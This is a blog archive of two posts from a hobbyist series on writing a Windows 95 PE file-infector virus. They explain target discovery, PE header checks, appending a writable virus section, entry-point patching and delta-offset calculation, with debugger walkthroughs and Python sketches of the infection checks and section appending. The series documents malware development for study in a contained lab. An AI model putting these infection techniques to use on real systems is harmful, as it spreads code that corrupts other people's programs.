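Because the delta is zero in generation 0, the same delta-adjusted code works unmodified in every generation.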

Using the delta offset

I used "ebp" to hold the delta offset in the above snippet and in my virus code so to rewrite the original findfirst snippet to be position independent means going from something like:


to an updated version that takes into account the delta offset in `ebp` for each variable reference:


In pijector.asm I rewrote all of the original minijector.asm variable references following the same process shown above. Now the virus code and variables are self-contained in the CODE section and the variable references are position independent thanks to the delta offset!

Patching the target entrypoint

In order to see the delta offset calculation in action it's handy to have executables infected by generation 0 actually run the virus code when the infected executable is started.

In future posts I'll cover how to do this correctly so that when the virus code is finished doing its dirty work it can return execution to the infected program's original entry point. For now because the virus code is still incomplete I can update the entry point to jump to the virus code and not worry about anything else. The infected programs will be broken but that's fine for now.

To get the virus code to be executed by the infected program I updated pijector.asm to set the entry point of the target executable to the starting virtual address of the .ireloc segment.

Complete Assembly Code

The complete pijector assembly code is available in the VeXation github repo in the pijector folder.

As with minijector the code can be built by running "make" in the pijector directory, or "make -DDEBUG" to build with debug symbols. "make run" will copy a clean calc.exe into the directory and start pijector.exe in Borland Turbo Debugger. That will let you step through infecting calc.exe. Remember that an infected calc.exe will be broken: its entry point now points at the virus code, and the virus isn't complete yet.

Observing the delta offset in action

The delta offset is confusing to reason about statically. I found it much easier to understand when I could step through generation 0's calculation and compare it to generation 1's calculation. Here's a brief run through of how I did that.

First I ran "make clean" and "make -DDEBUG" in the pijector directory to get a debug build. Then I ran "make run" to step through generation 0 in the debugger.

For this task I found it useful to use the "CPU" view instead of the source view so I clicked "View" then "CPU" and then maximized the CPU view window.

Generation 0


Debugging pijector.exe in CPU view

After the debugger loads execution is paused on the first part of the delta offset calculation at address 0x00401000. In the bottom right I can see the top of the stack is at address 0x0063FE3C and the value is 0xBFF88E93.

After stepping forward one instruction by pressing F8 the debugger will look as follows in the CPU view window:

One step into the pijector.exe delta offset calculation

Now the top of the stack is 0x0063FE38 and has the new value 0x00401005. I can cross-reference that with the primary disassembly view to see that 0x00401005 is the address of the "pop ebp" instruction, just as expected.

After stepping forward with F8 once more the debugger will look as follows:

Two steps into the pijector delta offset calculation

Now the virus code has popped the top of the stack into the "ebp" register and it holds the value "0x00401005". This value is the address of the "pop ebp" instruction, so far so good.

Finally by pressing F8 one last time the debugger will show the end of the delta offset calculation:

The end of the pijector delta offset calculation

Now "offset @@delta" has been subtracted from "ebp" and it's left holding the value 0x00000000.

Wait a second. All zero? Is that right?

Yes! Remember that this is generation 0 so the code is executing from the place the assembler/linker put it. All of the original offsets are correct as-is. The delta offset that needs to be applied is 0 and the calculation is correct.

After hitting F9 to continue execution the pijector.exe process will finish its work and terminate and I'm left with an infected calc.exe to repeat the process with.

Generation 1

Now that I have an infected generation 1 calc.exe I can see how its delta offset calculation produces a different result than generation 0.

Running "td32 calc.exe" loads the generation 1 program and pauses execution at a debugger screen like this (after dismissing the warning about missing symbols):

Debugging an infected calc.exe in CPU view

Right away I can use the debugger's output to see the entry point patching worked because the debugger is paused at 0x00413000 which is the base address of where calc.exe is loaded (0x00400000) plus the RVA of the .ireloc section shown in "tdump calc.exe" (0x00013000). The disassembly is also clearly the delta offset calculation from the virus code and not some part of the original calc.exe code.

Now I can follow the same process as before, single stepping with F8 and watching the delta offset calculation happen piece by piece. After one step forward the debugger view will look as follows:

One step into the calc.exe delta offset calculation

Like before the "call" instruction changed the top of the stack. Now the top of the stack is 0x0064FE38 and has the value 0x00413005. That's the address of the "pop ebp" instruction that follows the "call" in the disassembly view so the calculation appears the same as generation 0 so far.

Stepping forward once more with F8 gives the following view:

Two steps into the calc.exe delta offset calculation

Now "ebp" holds 0x00413005, the address of the "pop ebp" instruction after the "call". This still matches what happened in generation 0, no surprises so far.

One more step forward with F8 shows the critical difference in generation 1's delta offset calculation:

The end of the calc.exe delta offset calculation

After subtracting "offset @@delta" the "ebp" register is left with the value 0x00012000 and not 0x00000000. This value (0x00012000) is the generation 1 delta offset!

The easiest way to verify this is the correct delta offset for the calc.exe generation 1 infection is to compare the tdump of the generation 0 pijector.exe and the infected generation 1 calc.exe.



In the pijector.exe tdump output the CODE section is located at RVA 0x00001000. In the infected calc.exe the .ireloc section is located at RVA 0x00013000.

Taking 0x00013000 - 0x00001000 gives 0x00012000, the same delta offset that the generation 1 virus code calculated at runtime. Right-on! Now throughout this instance of the virus code variable references can be corrected for their current location by adding 0x00012000 to the original variable offset.

Closing notes

There is still one big problem left to address before pijector could be a real functional virus: the way the virus code uses Win32 API functions won't work in generations 1+.

If a program infected by pijector is run it will immediately crash at the first invocation of FindFirstFileA. Fixing this problem is going to take even more runtime contortions and I'll save that for the next post :-) It's a lot of work to make a functional virus!

Beyond that big problem there's also a smaller problem: the generation 0 pijector.exe binary will only work if it's run under td32 or another debugger. The reason is fairly simple to understand: moving the old .data section into the .code section means the virus is writing to its own code and that's not what Borland Turbo Assembler expected.

When tasm32/tlink32 builds the generation 0 pijector.exe binary the CODE section it creates is marked "CER" (contains code, executable, readable). Notably it doesn't have the "W" flag for "writable". This is only a problem for generation 0 because every subsequent generation will have virus code located in a section that the previous generation of the virus created, not Borland, and the virus code always makes the sections it creates writable.

The generation 0 binary works correctly when run in td32 because it (and other debuggers) make the code section of the debugged program writable in order to be able to add breakpoints. One way to remove the dependence on using a debugger to run generation 0 is to write a small utility program that edits generation 0's CODE section metadata after the executable is built so that it has the writable flag. I'm already strapped for time so for now I'll live with always running generation 0 in a debugger :-)

Thanks for sticking with me while I go on this VXing journey. As always, I would love to hear feedback about this project. Feel free to drop me a line on twitter (@cpu) or by email (daniel@binaryparadox.net).

Wednesday, 30 January 2019

PE File Infector Basics

Welcome back! If this is your first visit to VeXation you may want to start by reading about the project or the development environment I'm using. In this post I'll describe some of my experience starting on a Windows 95 file infector virus.

The first objective of a file infector is to add its own code to another file. In my case the files will be executables. The second objective of a file infector is to make sure the newly added virus code is run in addition to the original executable code. If the virus code isn't run it can't propagate to new executables. If the original executable code isn't run then the virus broke the program it infected and will probably be detected before spreading very far.

To make things manageable I started with the first objective: adding code to another executable. I prefer to work in small chunks where possible so I chose to break the task up as follows:
  1. Finding new target executables.
  2. Deciding if a target is suitable for infection.
  3. Adding a new section to the target with the correct size and metadata.
  4. Writing the virus code into the new section of the target.
As I introduce each topic at a high level I'll share some snippets of my assembly code so far. Towards the end I'll share the full assembly source code along with some pointers, and will share how I validated my work with some handy low level tools.

Generation 0

Initially it took me some time to wrap my head around "Generation 0" of a virus versus subsequent generations. I'm not certain if anyone else uses this "generation" terminology but it's what made sense to me.

Typically when you encounter a virus as an end user it's from running a benign program that was infected by a virus. Have you ever asked yourself how that program was infected? Chances are high that it was infected by another infected benign program. If you imagine tracing these infections backwards eventually there must have been a "Generation 1", the first benign executable infected by the virus.

How was the generation 1 program infected? The author of the virus must have conspired to do this using what I call "Generation 0" - a program built to bootstrap the infection process. Unlike "Generation n" there is no benign functionality in generation 0, it exists only to infect.

Having some terminology in mind was important because I found later on there were practical considerations to be made based on whether the code executing is generation 0 of the virus or a subsequent generation.

Finding target .EXEs

One of the classic problems of virus development is making sure that your creation doesn't escape the "lab" or destroy your development system. I imagine this was extra tricky before virtualization was easy. With the potential for disaster in mind I decided to start by only finding target executables to infect within the same directory as the generation 0 program. It isn't very difficult to recursively search other directories down the road.

This simple infection strategy also made development easier. For example I wrote my `Makefile`'s `run` target to copy a clean calc.exe from C:\Windows into the current directory before running the generation zero program. Everything is neatly contained in the working directory.

Finding target files requires using Win32 API functions. I found a copy of win32.hlp for Windows 95 that I use as my primary reference for the available Win32 APIs, their arguments and their return values. Pay particular attention to return values! Some API functions (e.g. FindNextFileA) return 0 for errors. Other API functions (e.g. FindFirstFileA) return something non-zero for errors (e.g. 0xFFFFFFFF for FindFirstFileA).

1995's API docs aren't so bad after all

To keep things simple I have been limiting my code to single-byte strings which means using the "A" variant of some win32 APIs (for ANSI) vs the "W" variant (for wide characters). Remember to drop the "A" suffix when looking up documentation (e.g. search for FindFirstFile in the win32.hlp index not FindFirstFileA). Assembly programmers have to care about "A" vs "W" where normally the Windows C headers hide this distinction from programmers with preprocessor macros.

To find files in the current directory requires using a combination of FindFirstFileA and FindNextFileA. The first is used to start a directory traversal and the second is used to continue it. By providing a pointer to the null terminated string "*.exe" as the lpFileName I'm able to start a traversal of all executables (if any!) in the current directory.
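For readers who don't have the Win32 calls in their head, here is a loose Python analogue of that traversal. It is only a sketch: `os.scandir` stands in for the FindFirstFileA/FindNextFileA pair, the case-insensitive match imitates how Windows treats file names, and the function name `find_targets` is invented for this example.

```python
import fnmatch
import os


def find_targets(directory=".", pattern="*.exe"):
    """Yield file names in `directory` that match `pattern`, ignoring case."""
    with os.scandir(directory) as entries:      # roughly FindFirstFileA
        for entry in entries:                   # roughly FindNextFileA
            name = entry.name
            if entry.is_file() and fnmatch.fnmatchcase(name.lower(), pattern):
                yield name
```

Like the virus code, this never leaves the directory it is pointed at, which keeps experiments contained.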



Deciding if a target is suitable

This is another classic virus dilemma. Not all target programs are created equal and infecting the wrong program can be disastrous, breaking the target and making the infection inert.

What should be checked?

A good executable infector needs to check that:
  1. The target file is a true executable (e.g. not something else renamed to have an .exe extension).
  2. The target file is a supported executable format (e.g. a PE executable).
  3. The target file is a "normal" PE executable (e.g. not a DLL).
  4. The target file's code is the right architecture (e.g. x86 code).
  5. The target file is for a supported Windows version (e.g. Win95 not NT).
  6. The target file has space for the infection, or can support adding space.
  7. The target file hasn't already been infected.
There's a lot to consider! Since I'm targeting Windows 95 I knew the answer to all of the above involved understanding the Portable Executable (PE) format. This is the native executable format for Win95 and supplies ways for a diligent virus writer to check all of these things.

I found there was no better resource for understanding PE's than Matt Pietrek's classic from 1994: "Peering Inside the PE: A Tour of the Win32 Portable Executable File Format". It's a lot to take in at once but I hope calling out the most important parts as I go along will make it a bit more accessible. If you've been around the block with modern Windows much of this will be familiar because Windows still uses PE executables!

If you're more visually minded then Ange Albertini's excellent PE 101 Illustrated is another great companion resource to have handy.

PE 101 illustrated by Ange Albertini


Checking a target executable file

At a high level checking a target file is pretty straightforward. I needed to:

  1. open the file for reading.
  2. check the overall file size.
  3. memory map the file.
  4. carefully check offsets within the memory mapped contents.

To open an existing file I need to use the counter-intuitively named CreateFileA function from the Win32 API. This returns a handle for the file that can be used for further operations. The handle doesn't allow reading from the file by itself but can be used with API calls that can.

To get the file size I used the handle from CreateFileA with the GetFileSize function. Windows supports file sizes from 0 to 2^64 - 1 bytes so the return value from GetFileSize is split into a lower order DWORD (four bytes) returned in the eax register (the win32 api uses the "stdcall" calling convention) and a higher order DWORD (stored using the pointer provided as input to GetFileSize). Since I'm only concerned with verifying a target file is at least big enough to hold the expected PE header structures I can ignore the pointer to the higher order DWORD and just examine the lower order DWORD returned directly from GetFileSize.
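The low/high DWORD split is easy to model. This Python sketch (helper names are mine, not Win32's) shows how a 64-bit size breaks into the two halves and why the low half alone is enough for any file under 4 GiB.

```python
def split_file_size(size):
    """Split a 64-bit size into (low DWORD, high DWORD)."""
    low = size & 0xFFFFFFFF
    high = (size >> 32) & 0xFFFFFFFF
    return low, high


def join_file_size(low, high):
    """Rebuild the 64-bit size from the two DWORDs."""
    return (high << 32) | low


small = split_file_size(0x38E)          # a tiny file: high DWORD is 0
large = split_file_size(5 * 2**30)      # a 5 GiB file needs the high DWORD
print(small, large)
```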

There are two paths forward to read and write data from the file handle. Either using SetFilePointer and ReadFile/WriteFile or using memory mapping. I chose to use memory mapping because it involved making fewer API calls and seemed slightly more straightforward.

Memory mapping requires calling CreateFileMappingA using the file handle from CreateFileA to get yet another handle, this time to a file mapping object. I was able to use the file mapping object handle with MapViewOfFile to map a specified portion of the underlying file into memory. The return value from this function is a pointer to the region of memory the file was mapped into and it's possible to read and write from this region to access and change the file's contents.
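Python's standard `mmap` module wraps the same idea, so a small sketch can show the shape of the open/map/read sequence. The function name `starts_with_mz` is hypothetical, and the comments map each step onto the Win32 call it loosely corresponds to.

```python
import mmap


def starts_with_mz(path):
    """Map a file into memory and check for the DOS "MZ" signature."""
    with open(path, "r+b") as f:                  # like CreateFileA
        # Length 0 maps the whole file; this raises ValueError for an
        # empty file, so real code should check the size first.
        with mmap.mmap(f.fileno(), 0) as view:    # like CreateFileMappingA + MapViewOfFile
            # The view behaves like a byte array backed by the file.
            return view[:2] == b"MZ"
```

Writes through the view (for example `view[0:2] = b"MZ"`) change the file itself, which is what makes this approach convenient for patching headers in place.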


Offsets to check

With the file memory mapped it's possible to check whether it can be infected by examining key offsets within the DOS and PE headers. Initially when I was looking at example PE infector source code from this era I found most were using numeric offsets as magic numbers throughout the code. For example, here's one snippet I found that copies the file and section alignment from a PE header using numeric offsets:


I'm not sure if this is because programmers were often ripping working assembly from viruses found in the wild missing source level context or if it was just how people did it at the time. Either way I found it made code that was difficult to read.

Life was much easier when I used my assembler's ability to define structures. TASM/MASM both support the STRUCT keyword for this. If there was a STRUCT for the PE header and its optional header then the section and file alignment fields could be accessed without using numeric offsets like 0x3C and 0x38:


I found that the MASM32 distribution came with a great windows.inc file that contained many predefined structure definitions, including the ones most important for PE manipulation: IMAGE_DOS_HEADER and IMAGE_NT_HEADERS. One thing I noticed was that the windows.inc field names didn't always match up to the PE docs exactly (e.g. SecHdrVirtualAddress vs VirtualAddress). This is because MASM (and TASM in compatibility mode) doesn't locally scope names within structs, meaning there can be only one structure field named VirtualAddress across all structs. If another struct needs a field for a similar purpose it can't use the same name and has to add a prefix (e.g. SecHdr for the section header).

Example IMAGE_OPTIONAL_HEADERS struct

For this project I needed to check each target file for the following things to decide if it could be infected:
  1. There should be an IMAGE_DOS_HEADER DOS MZ header at the very start of the file.
  2. The e_lfanew pointer from the IMAGE_DOS_HEADER should point to an IMAGE_NT_HEADERS PE header.
  3. The IMAGE_NT_HEADERS' OptionalHeader's Subsystem field should be Windows GUI or Windows CUI (e.g. a graphical or command line Windows program).
  4. The IMAGE_NT_HEADERS' FileHeader's Machine field should be i386.
  5. There shouldn't be an IMAGE_SECTION_HEADER present with the same name as the virus code section (or it's already infected).
  6. There should be enough space for an additional IMAGE_SECTION_HEADER to be added.
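The six checks above can be sketched against a byte buffer in Python. This is a model under stated assumptions, not a port of minijector.asm: it assumes a 32-bit PE with the standard field offsets (e_lfanew at 0x3C, Subsystem 68 bytes into the optional header, 40-byte section headers), treats "enough space" as one more header fitting before the lowest non-zero PointerToRawData, and the name `can_infect` is made up.

```python
import struct

IMAGE_FILE_MACHINE_I386 = 0x014C
IMAGE_SUBSYSTEM_WINDOWS_GUI = 2
IMAGE_SUBSYSTEM_WINDOWS_CUI = 3
SECTION_HEADER_SIZE = 40


def can_infect(data, virus_section=b".ireloc"):
    """Return True if the bytes in `data` pass all six checks."""
    # 1. DOS "MZ" header at the very start of the file.
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    # 2. e_lfanew must point at a "PE\0\0" signature.
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    opt = e_lfanew + 4 + 20  # skip the signature and IMAGE_FILE_HEADER
    if len(data) < opt + 70 or data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return False
    machine, nsections = struct.unpack_from("<HH", data, e_lfanew + 4)
    (opt_size,) = struct.unpack_from("<H", data, e_lfanew + 20)
    (subsystem,) = struct.unpack_from("<H", data, opt + 68)
    # 3. Windows GUI or CUI subsystem only.
    if subsystem not in (IMAGE_SUBSYSTEM_WINDOWS_GUI, IMAGE_SUBSYSTEM_WINDOWS_CUI):
        return False
    # 4. i386 code only.
    if machine != IMAGE_FILE_MACHINE_I386:
        return False
    table = opt + opt_size
    table_end = table + nsections * SECTION_HEADER_SIZE
    if len(data) < table_end:
        return False
    first_raw = None
    for off in range(table, table_end, SECTION_HEADER_SIZE):
        # 5. A section with the virus's name means "already infected".
        if data[off:off + 8].rstrip(b"\0") == virus_section:
            return False
        (raw_ptr,) = struct.unpack_from("<I", data, off + 20)
        if raw_ptr and (first_raw is None or raw_ptr < first_raw):
            first_raw = raw_ptr
    # 6. One more header must fit before the first section's data.
    return first_raw is not None and table_end + SECTION_HEADER_SIZE <= first_raw
```

Every read is preceded by a length check so a truncated or hostile file returns False instead of raising.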


Adding virus code

There are lots of ways to add new virus code to an existing PE executable. Three common ways I considered were:
  1. Adding the virus code in one piece in the unused padding of an existing code section.
  2. Breaking the virus code into pieces and putting those pieces in unused space found in an existing code section.
  3. Adding the virus code as a whole new code section.
Option 1 is straightforward but could mean some target files won't have enough space to be infected. PE code sections are usually aligned on disk by 0x200 bytes (the actual alignment is specified in the PE header), meaning that in the best case if an existing code segment were 0x201 bytes before being aligned with padding the virus could be up to 0x1FF bytes. In the worst case if the existing code segment was exactly 0x200 bytes before alignment then there would be 0 bytes left for an infection! Since I wasn't sure what an "average" amount of padding was for executables from this era, or how big my virus would eventually be I decided not to pursue this approach to start with.
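The best and worst cases for option 1 fall out of a one-line calculation. A small Python sketch (the helper name `slack_bytes` is mine) makes the two examples concrete:

```python
def slack_bytes(code_size, file_alignment=0x200):
    """Padding bytes left over after rounding code_size up to the alignment."""
    return (-code_size) % file_alignment


best = slack_bytes(0x201)   # one byte over a boundary: almost a full block free
worst = slack_bytes(0x200)  # exactly on a boundary: nothing free
print(hex(best), hex(worst))
```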

Option 2 is more complex but can make better use of free space in places other than the section padding. The complexity involved in breaking up the virus code into little segments and connecting them up at run-time was too much to make this a good choice when I was just starting out.

Option 3 is what I settled on. This option gave me freedom to make my virus as big as I wanted and looked like a good place to start. The only space constraint this approach has is making sure that there is enough room in the PE header for one new section metadata entry.

The downsides of this approach relate to anti-virus. Putting it bluntly adding a new section is not subtle. You can identify whether a file is infected or not based on the presence of the new section (in fact that's how I prevent reinfection). You could even "inoculate" files against infection by adding a benign section with the same name as the virus section. Unlike options 1 and 2, this option also changes the infected file's size on disk. Lastly, from an AV perspective it's easy to disinfect infected programs by restoring the original entrypoint and deleting the malicious segment. Since I was mostly unconcerned with AV these downsides were acceptable.

At a high level adding a new section means:
  1. Increasing the NumberOfSections WORD in the IMAGE_NT_HEADERS' FileHeader.
  2. Finding the end of the IMAGE_SECTION_HEADERS array and adding one more entry.
  3. Calculating the correct VirtualSize, SecHdrVirtualAddress, SizeOfRawData and PointerToRawData for the new IMAGE_SECTION_HEADER.
  4. Setting the correct SecHdrCharacteristics flag for the new IMAGE_SECTION_HEADER.
Increasing the NumberOfSections is self explanatory. Finding the end of the IMAGE_SECTION_HEADERS array requires some math. The start of this array is always immediately after the end of the base PE IMAGE_NT_HEADERS structure. I knew where the start of the PE structure is (the e_lfanew pointer from the IMAGE_DOS_HEADER) and I knew the size of the IMAGE_NT_HEADERS structure. That gives me the end of the PE structure and the start of the IMAGE_SECTION_HEADER array. I can calculate the offset to the end of the array as the number of sections (NumberOfSections) multiplied by the size of each IMAGE_SECTION_HEADER structure.
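The offset math can be sketched in a few lines of Python. The sizes assume a 32-bit PE (a 4 byte signature, a 20 byte file header and a 224 byte optional header), and the e_lfanew value of 0x80 is a hypothetical example rather than a value read from calc.exe.

```python
SIZEOF_IMAGE_NT_HEADERS = 4 + 20 + 224   # signature + file header + optional header
SIZEOF_IMAGE_SECTION_HEADER = 40


def new_section_header_offset(e_lfanew, number_of_sections):
    """File offset where one more IMAGE_SECTION_HEADER would be written."""
    table_start = e_lfanew + SIZEOF_IMAGE_NT_HEADERS
    return table_start + number_of_sections * SIZEOF_IMAGE_SECTION_HEADER


# Hypothetical e_lfanew of 0x80 with six existing sections.
offset = new_section_header_offset(0x80, 6)
print(hex(offset))
```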



Having to calculate two sizes (VirtualSize, and SizeOfRawData) and two offsets (SecHdrVirtualAddress and PointerToRawData) for the section header metadata may seem strange at first. The duplication is more understandable when put in context. A PE section describes something that exists both on disk, and eventually once loaded by the OS, in memory. These two contexts have different requirements. As one example on disk it's beneficial for code to be aligned to suit the filesystem. In memory it's beneficial for code to be aligned to suit memory pages. Having one format that can describe both the "virtual" (in memory) and the "physical/raw" (on disk) makes sense and allows for a lot of flexibility.

Calculating the right virtual size and raw data size required knowing the original unaligned size of the virus code. TASM provides a handy tool for this known as the "location counter symbol".

Borland Turbo Assembler 5.0 "Location Counter Symbol" Docs

By placing a label (viral_payload) at the very start of the virus code I could use the location counter symbol ($) in an equate that provided an accurate size constant (viral_payload_size) for the rest of the code to use:

viral_payload_size EQU $ - viral_payload

This equate stayed current as I tweaked the code and avoided having to update a fixed value. The unoptimized assembly linked to later in this post ends up having viral_payload_size EQU 38Eh, a pretty beefy 910 bytes.

Aligning the virtual and raw sections according to the required alignment sounds difficult but is just a way of saying that the unaligned size must be made evenly divisible by the alignment value. The calculation is:

(((originalSize - 1) / alignment) + 1) * alignment

A typical value for the PE optional header section alignment is 0x1000, so the adjusted VirtualSize of the new section assuming the viral_payload_size is 0x38E is:

VirtualSize = (((0x38E - 0x1) / 0x1000) + 0x1) * 0x1000 = 0x1000 = 4096

For the SizeOfRawData a typical file alignment value is 0x200, so the calculation is:

SizeOfRawData = (((0x38E - 0x1) / 0x200) + 0x1) * 0x200 = 0x400 = 1024

In both cases you can see the aligned size ends up larger than the original virus size. The extra space in the file and in memory will be empty padding and that's why file infectors often find the space they need in existing executable segments.
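The alignment formula translates directly to Python if integer division is used, which makes it easy to double check the two results above. The function name `align_up` is just a label for this sketch.

```python
def align_up(size, alignment):
    """Round size up to the next multiple of alignment (integer math)."""
    return (((size - 1) // alignment) + 1) * alignment


VIRAL_PAYLOAD_SIZE = 0x38E  # 910 bytes, from the equate above

virtual_size = align_up(VIRAL_PAYLOAD_SIZE, 0x1000)   # section alignment
size_of_raw_data = align_up(VIRAL_PAYLOAD_SIZE, 0x200)  # file alignment
print(hex(virtual_size), hex(size_of_raw_data))
```

A size that is already a multiple of the alignment comes back unchanged, which is why the formula subtracts 1 before dividing.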

The SecHdrVirtualAddress value is a relative virtual address (RVA) that specifies where the section will start in memory relative to where the loader puts the executable. Many things are specified as RVAs so it's important to be familiar with this concept. I wanted my new section to start after the end of the existing final section in the target executable which meant the SecHdrVirtualAddress for the new section needed to point at the last section's SecHdrVirtualAddress plus the last section's VirtualSize.

The PointerToRawData value plays a similar role on disk, but it is a plain file offset rather than an RVA: it specifies where the section's data starts relative to the beginning of the PE file. The new section should start after the last section on-disk so the PointerToRawData value needed to be the last section's PointerToRawData plus the last section's SizeOfRawData.
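Both placements are simple sums over the last section's header fields. In this Python sketch the input values are hypothetical (they are not copied from the calc.exe tdump), and it assumes the last section's sizes already land on the required alignment boundaries.

```python
def next_section_placement(last_rva, last_virtual_size, last_raw_ptr, last_raw_size):
    """Return (SecHdrVirtualAddress, PointerToRawData) for a new final section."""
    new_rva = last_rva + last_virtual_size      # where it starts in memory
    new_raw_ptr = last_raw_ptr + last_raw_size  # where it starts on disk
    return new_rva, new_raw_ptr


# Hypothetical last section: RVA 0x12000, 0x1000 bytes in memory,
# stored at file offset 0xD000 and 0x1000 bytes on disk.
rva, raw_ptr = next_section_placement(0x12000, 0x1000, 0xD000, 0x1000)
print(hex(rva), hex(raw_ptr))
```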

The last part was setting the SecHdrCharacteristics flag. The new section contains code and should be executable and readable. In the future I know I'll want the virus code to be able to modify parts of its own section so I also wanted the section to be writable. All told this meant the flag value was the combination of the IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_EXECUTE and IMAGE_SCN_CNT_CODE bitmasks.
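Combining the four bitmasks is a bitwise OR. The constant values below are the standard ones from the PE format; the sketch just shows what the final DWORD looks like.

```python
IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000

characteristics = (
    IMAGE_SCN_CNT_CODE
    | IMAGE_SCN_MEM_EXECUTE
    | IMAGE_SCN_MEM_READ
    | IMAGE_SCN_MEM_WRITE
)
print(hex(characteristics))

# Testing a single flag is a bitwise AND against its mask.
is_writable = bool(characteristics & IMAGE_SCN_MEM_WRITE)
```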



Writing the virus code into the new section

The last trick I needed to perform is to expand the target's overall file size. The new section metadata that gets added is inside of existing slack space between the end of the IMAGE_NT_HEADERS structure and the beginning of the first section and didn't require changing the file size. The new section content will be added at the end of the file and so I had to enlarge the overall executable to make room after the last section's contents.

Increasing the file size turns out to be pretty easy and only required remapping the file using CreateFileMappingA and MapViewOfFile again, adjusting the arguments to account for the new space. Because I'm modifying a PE file on disk I need to adjust by the new section's SizeOfRawData not the original unpadded size or the VirtualSize.


After the enlarged view of the file is mapped it was just a matter of copying the generation 0 code that is currently executing from memory and into the new section. For this I used a fun bit of self-referential code that relies on the viral_payload label and the new SizeOfRawData to know where to begin copying from and how many bytes to copy.
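The grow-then-copy step can be modelled on an in-memory byte buffer. This Python sketch is a simplification: it copies only the payload bytes and leaves the rest of the new section zero-filled, and the function name and sample values are assumptions for illustration.

```python
def append_section_data(image, payload, raw_ptr, raw_size):
    """Grow `image` to hold a new section and copy `payload` into it."""
    if len(payload) > raw_size:
        raise ValueError("payload does not fit in the new section")
    grown = bytearray(image)
    # Enlarge the file so it ends at raw_ptr + raw_size (zero padding).
    missing = raw_ptr + raw_size - len(grown)
    grown.extend(bytes(max(0, missing)))
    # Copy the payload to the start of the new section.
    grown[raw_ptr:raw_ptr + len(payload)] = payload
    return bytes(grown)


original = b"A" * 0x400           # stand-in for the target file's contents
payload = b"\xCC" * 0x38E         # stand-in for the virus code
infected = append_section_data(original, payload, raw_ptr=0x400, raw_size=0x400)
print(len(original), len(infected))
```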



Assembly code

The full code that implements all of the above is available in the VeXation Github repo under the `minijector` folder. "Mini" because it isn't a finished virus, "jector" because saying "injector" over and over was driving me batty.

Assuming you have the same dev environment set up as I do you can build the project with make (or with debug symbols using make -DDEBUG). If you want to step through an infection process run make run which will copy a clean calc.exe into the project directory and then run td32 on the minijector.exe generation 0 binary to let you step through the infection process.

A few high level notes:

  • The majority of the good stuff is in minijector.asm.
  • I used .model flat, stdcall at the start so that subsequent call instructions for Win32 APIs are handled correctly by default. Win32 uses the stdcall calling convention and it's a pain to push arguments onto the stack in reverse order manually.
  • I didn't use any of TASM's "Ideal" mode and the code should be MASM compatible.
  • My windows.inc file is a stripped down version of what comes with the MASM32 SDK. Using the unaltered full windows.inc with default tasm settings results in build errors because it's SO BIG. I cut it down to only what minijector uses.
  • I chose to name the virus segment ireloc. That's because most PE binaries already have a reloc section and an idata section. ireloc sounds like it should belong, no? :-)
  • I tried to write defensive code. Lots of public virus source code skips checking error returns from API calls or assumes the DOS/PE headers aren't malicious/invalid and I hope paying attention to that stuff makes my extremely simple virus marginally less lame. That said, I'm sure I messed something up and a malicious PE file could be crafted that will crash the infection routines. (Send me a sample if you make one!)
  • I used a lot of locally scoped (@@ prefixed) labels as something between a comment and a marker post for navigating the source code. This is probably a "quirk" of my own style and not a great practice.
  • I'm a pretty novice assembly programmer, so (kind) feedback is welcome!

Verifying the work so far

Whenever computers are involved I find it's helpful to verify my work in as many ways as possible. Since PE files exist both at-rest on disk and in-memory at-runtime I found it useful to verify both states of an infected calc.exe looked like I expected after running the minijector.exe generation 0 infector in the same directory.

Borland Turbo Assembler 5.0 comes with a handy program called tdump, short for (hold your laughter) "Turbo Dump". This command lets you easily see PE metadata for a given executable. I've included the tdump output I referenced for a clean calc.exe here, and the tdump of an infected calc.exe here.

There is one important difference in the output that I used to verify the work so far. The original calc.exe has the following sections in the object table:


The infected calc.exe has one more section (the virus section!) in addition to all of the above:


It was also reassuring at this point to see an RVA value (corresponding to the SecHdrVirtualAddress field) that was higher than all of the previous sections' RVA values, as well as a Physical Offset (corresponding to the PointerToRawData field) that was higher than all of the previous sections' Physical Offsets. Also reassuring was seeing that the two sizes of the new section both seemed properly aligned and matched my earlier padding calculations.

As mentioned before the new virus section is not subtle and its flags value (corresponding to the SecHdrCharacteristics field) makes it even less so. I set the characteristics flag of the section to be read/write as well as executable in preparation for future work and a writable code section will likely tickle some AV heuristics.

To be extra sure things were working as expected I used the values from tdump as a map into a raw hexdump -C of both the clean calc.exe and the infected calc.exe. I cheated here and ran hexdump from my Linux host because I really didn't want to find a hex dump utility for Windows 95. I included the hexdump output from a clean calc.exe here and from the infected calc.exe here.

Looking at the diff between the two hexdumps showed what I was expecting. Early in the file there was a diff to the number of sections (a 0006 changed to a 0007). There is also an addition of new section metadata including the .ireloc string bytes (2E 69 72 65 6C 6F 63 00 == ".ireloc\0"). Towards the end of the file was a big blob of new data that isn't present in the original file (the virus code!).
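Those hexdump observations are easy to sanity check by decoding the bytes. In this Python sketch the byte strings are typed in from the description above; the section count is decoded as a little-endian WORD, which is how it is stored in the file header.

```python
import struct

# The 8-byte section name field seen in the infected file.
name_field = bytes.fromhex("2E 69 72 65 6C 6F 63 00")
section_name = name_field.rstrip(b"\x00").decode("ascii")

# NumberOfSections before and after, as stored on disk (little-endian WORD).
(before,) = struct.unpack("<H", bytes.fromhex("06 00"))
(after,) = struct.unpack("<H", bytes.fromhex("07 00"))

print(section_name, before, after)
```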

That confirmed things look good at-rest on disk, but what about at-runtime when the infected calc.exe is loaded into memory? To verify this I turned to the trusty Turbo Assembler debugger td32.

Running the infected calc.exe in td32 initially generated a warning about there being no debug symbols (this is expected). After closing that I found myself at address 0x0040534E. I was able to turn back to the tdump output to understand why that is. The PE was loaded at the base address 0x00400000 and tdump says the entry point RVA is 0x0000534E. Add those two together and you get 0x0040534E, the start address of the original calc.exe code and the location the debugger is paused.

Since I didn't change the entry point of calc.exe to point to the new segment and the virus code, I had to go out of my way to find it in memory to look at the disassembly. I found the easiest way to do that (while execution is still paused at the start of the calc.exe code) was to:

  1. right click the viewing area and choose "Go To".
  2. enter the expression 00400000 + 00013000
Enter the target expression

The disassembly should look familiar

